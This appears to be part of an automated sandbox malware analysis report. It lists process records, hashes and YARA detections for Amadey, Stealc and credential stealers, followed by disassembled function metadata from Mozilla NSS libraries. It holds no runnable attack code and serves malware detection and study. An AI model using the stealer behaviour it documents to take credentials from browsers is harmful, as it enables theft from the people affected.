Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.2446509016.0000000000B91000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	04:34:00
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xb90000
File size:	3'330'048 bytes
MD5 hash:	54DBEA291C01A2BDFB4E2D6AE249EDE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.3289889853.0000000000B91000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	04:34:08
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe"
Imagebase:	0x3d0000
File size:	3'189'760 bytes
MD5 hash:	3B89A078C7DA637D1AAF49DEC99935B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2774204257.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2773461300.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2773690281.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2800114714.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2814219550.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2799388464.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2784188124.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2799292941.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2814302545.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2811596703.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2783959040.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2811136383.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2811767989.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 39%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	04:34:12
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe"
Imagebase:	0xfd0000
File size:	1'845'248 bytes
MD5 hash:	C8BDAE4B54EC9FB34BABE5908C1273F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000019.00000002.2826853766.000000000070E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000019.00000003.2786060868.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000019.00000002.2827858049.0000000000FD1000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
Antivirus matches:	Detection: 32%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	04:34:13
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2988 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	04:34:15
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7264 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	04:34:16
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xb90000
File size:	3'330'048 bytes
MD5 hash:	54DBEA291C01A2BDFB4E2D6AE249EDE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001C.00000002.2901825216.000000000149B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001C.00000002.2894025783.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001C.00000003.2853526780.0000000005260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	04:34:22
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe"
Imagebase:	0x3d0000
File size:	3'189'760 bytes
MD5 hash:	3B89A078C7DA637D1AAF49DEC99935B0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.2921265886.000000000134B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.3002870912.0000000001363000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001D.00000003.3081849711.00000000085A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.2996193043.0000000001355000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.2938921647.000000000134A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001D.00000002.3134859442.0000000006081000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.2940811405.0000000001355000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.2921839875.000000000134E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.3002358113.0000000001357000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.2920552958.000000000134A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.2939046647.0000000001355000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001D.00000002.3129335841.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	04:34:23
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe"
Imagebase:	0xf90000
File size:	2'805'248 bytes
MD5 hash:	1FCA2BFADB61E407F76BDEC22B777423
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	04:34:30
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe"
Imagebase:	0xfd0000
File size:	1'845'248 bytes
MD5 hash:	C8BDAE4B54EC9FB34BABE5908C1273F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000002.3008594002.0000000001B9B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000002.3007450920.0000000000FD1000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000003.2967174557.00000000058A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	04:34:38
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe"
Imagebase:	0xf90000
File size:	2'805'248 bytes
MD5 hash:	1FCA2BFADB61E407F76BDEC22B777423
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	04:34:46
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe"
Imagebase:	0x3d0000
File size:	3'189'760 bytes
MD5 hash:	3B89A078C7DA637D1AAF49DEC99935B0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3166497243.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3176586862.0000000000ECC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3212224215.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3204213691.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	04:34:54
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe"
Imagebase:	0xfd0000
File size:	1'845'248 bytes
MD5 hash:	C8BDAE4B54EC9FB34BABE5908C1273F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000022.00000002.3254080654.0000000000FD1000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000022.00000002.3253411166.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000022.00000003.3212643969.0000000005210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	04:35:03
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe"
Imagebase:	0xf90000
File size:	2'805'248 bytes
MD5 hash:	1FCA2BFADB61E407F76BDEC22B777423
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	29.2%
Total number of Nodes:	113
Total number of Limit Nodes:	13

Executed Functions

Function 6C6535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
__aulldiv.LIBCMT ref: 6C6536E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C653773
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C65377E
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C6537BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C6537C4
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C6537CB
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C653801
__aulldiv.LIBCMT ref: 6C653883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C653902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C653918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C65394C

Strings

GenuntelineI, xrefs: 6C653639
MOZ_TIMESTAMP_MODE, xrefs: 6C6535DB
QPC, xrefs: 6C6538FC
GTC, xrefs: 6C653912
AuthcAMDenti, xrefs: 6C653946

Memory Dump Source

Source File: 00000000.00000002.2439408234.000000006C651000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2439384922.000000006C650000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2439475773.000000006C6CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2439506962.000000006C6DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2439538981.000000006C6E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction ID: 14d1dd1505aced9cd8b45279eaef959e336740e5ad629c5ecbd62bb5e6e0c917
Opcode Fuzzy Hash: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction Fuzzy Hash: B0B1B4B1B083509FDB08DF2AC89461AB7F5EB8A700F15893DF499D3790D770A9018B8E

Function 6C66C930 Relevance: 7.6, APIs: 5, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 6C66C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C66C969
GetSystemInfo.KERNEL32(?), ref: 6C66C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C66C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C66C9E2

Memory Dump Source

Source File: 00000000.00000002.2439408234.000000006C651000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2439384922.000000006C650000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2439475773.000000006C6CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2439506962.000000006C6DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2439538981.000000006C6E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction ID: 8beecf542c0bdd91edfb1ad2115f65f53b1c160ab50849b684cb1bda7047f29d
Opcode Fuzzy Hash: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction Fuzzy Hash: 5221C531741A147BDB14AE67CCC4BAE72B9AB86744F50061AF903A7E80DB60780087AE

Function 6C653060 Relevance: 4.5, APIs: 3, Instructions: 36
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C653095

Part of subcall function 6C6535A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
Part of subcall function 6C6535A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
Part of subcall function 6C6535A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
Part of subcall function 6C6535A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
Part of subcall function 6C6535A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
Part of subcall function 6C6535A0: __aulldiv.LIBCMT ref: 6C6536E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C65309F

Part of subcall function 6C675B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6756EE,?,00000001), ref: 6C675B85
Part of subcall function 6C675B50: EnterCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675B90
Part of subcall function 6C675B50: LeaveCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675BD8
Part of subcall function 6C675B50: GetTickCount64.KERNEL32 ref: 6C675BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6530BE

Part of subcall function 6C6530F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C653127
Part of subcall function 6C6530F0: __aulldiv.LIBCMT ref: 6C653140

Part of subcall function 6C68AB2A: __onexit.LIBCMT ref: 6C68AB30

Memory Dump Source

Source File: 00000000.00000002.2439408234.000000006C651000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2439384922.000000006C650000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2439475773.000000006C6CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2439506962.000000006C6DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2439538981.000000006C6E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction ID: 7e821f3c6f95d7c1e9a327f8a3053eed9933defdbf171d57371cc51e0863054d
Opcode Fuzzy Hash: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction Fuzzy Hash: 48F0D612D2078896CB10DF7588911A6B370AF6F114F545729F84463A61FB2071E883DE

Non-executed Functions

Function 6C780700 Relevance: 145.2, APIs: 96, Instructions: 1215threadmemorytimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C780747

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C780760

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C78078C

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C899AEC,?), ref: 6C7807A4

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

PR_SetError.NSS3(FFFFE076,00000000), ref: 6C780932

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_GetCurrentThread.NSS3 ref: 6C7807B0

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

DER_GetInteger_Util.NSS3(-00000004), ref: 6C7807D4
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C78093D
PR_SetError.NSS3(FFFFE09D,00000000), ref: 6C780972
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C899D5C,?), ref: 6C780998
PR_GetCurrentThread.NSS3 ref: 6C7809A8
PR_SetError.NSS3(FFFFE081,00000000), ref: 6C7809C5
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C780A7A
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C899BEC,?), ref: 6C780AC2
PR_GetCurrentThread.NSS3 ref: 6C780AD2
CERT_ImportCerts.NSS3(?,0000000A,?,?,00000000,00000000,00000000,00000000), ref: 6C780B2B
PR_SetError.NSS3(FFFFE081,00000000), ref: 6C780B44
PORT_NewArena_Util.NSS3(00000800), ref: 6C780BAC
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6C899D08,?), ref: 6C780BCD
PR_GetCurrentThread.NSS3 ref: 6C780BDD
PR_SetError.NSS3(FFFFE081,00000000), ref: 6C780BFD
PR_SetError.NSS3(FFFFE07F,00000000), ref: 6C780C11
PR_SetError.NSS3(FFFFE073,00000000), ref: 6C780C76
PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C780CF3
SECITEM_ArenaDupItem_Util.NSS3(00000000,?), ref: 6C780D1B
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,00000000), ref: 6C780D36
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C780D94
CERT_DestroyCertArray.NSS3(?,00000000), ref: 6C780DC3
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C780DE8
PR_GetCurrentThread.NSS3 ref: 6C780DFD
PR_SetError.NSS3(FFFFE090,00000000), ref: 6C780E22
SECITEM_CompareItem_Util.NSS3(00000047), ref: 6C780E5A
PR_SetError.NSS3(FFFFE07F,00000000), ref: 6C780E6F
CERT_IsCACert.NSS3(00000000,00000000), ref: 6C780E7F
PR_SetError.NSS3(FFFFE090,00000000), ref: 6C780EBC
PR_GetCurrentThread.NSS3 ref: 6C780F2E
PR_GetCurrentThread.NSS3 ref: 6C780F3C
PR_SetError.NSS3(FFFFE09D,00000000), ref: 6C780F51
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C780F5A
PR_GetCurrentThread.NSS3 ref: 6C780F7F
CERT_DestroyCertificate.NSS3 ref: 6C780F95
DER_GeneralizedTimeToTime_Util.NSS3(?,0000009F), ref: 6C780FE8
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C781060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C78107F
SECOID_FindOID_Util.NSS3(?), ref: 6C78108C
SECITEM_CompareItem_Util.NSS3(?,00000000), ref: 6C7810CB
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C7810F9

Part of subcall function 6C77F3F0: SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C77F453
Part of subcall function 6C77F3F0: SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C77F4A5
Part of subcall function 6C77F3F0: SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C77F4EA

SECITEM_CompareItem_Util.NSS3(?,00000000), ref: 6C7810DD
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C78110E
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C78112A
CERT_DestroyCertificate.NSS3(00000000), ref: 6C781141
CERT_DestroyCertificate.NSS3(00000000), ref: 6C78114E
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C7811B7
SECITEM_CompareItem_Util.NSS3(00000047), ref: 6C781202
PR_SetError.NSS3(FFFFE07F,00000000), ref: 6C78121A
SECOID_FindOID_Util.NSS3(?), ref: 6C781226

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000), ref: 6C781268
PK11_HashBuf.NSS3(?,?,?,?), ref: 6C781285
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C781294
SECITEM_CompareItem_Util.NSS3(00000000,?), ref: 6C7812A7

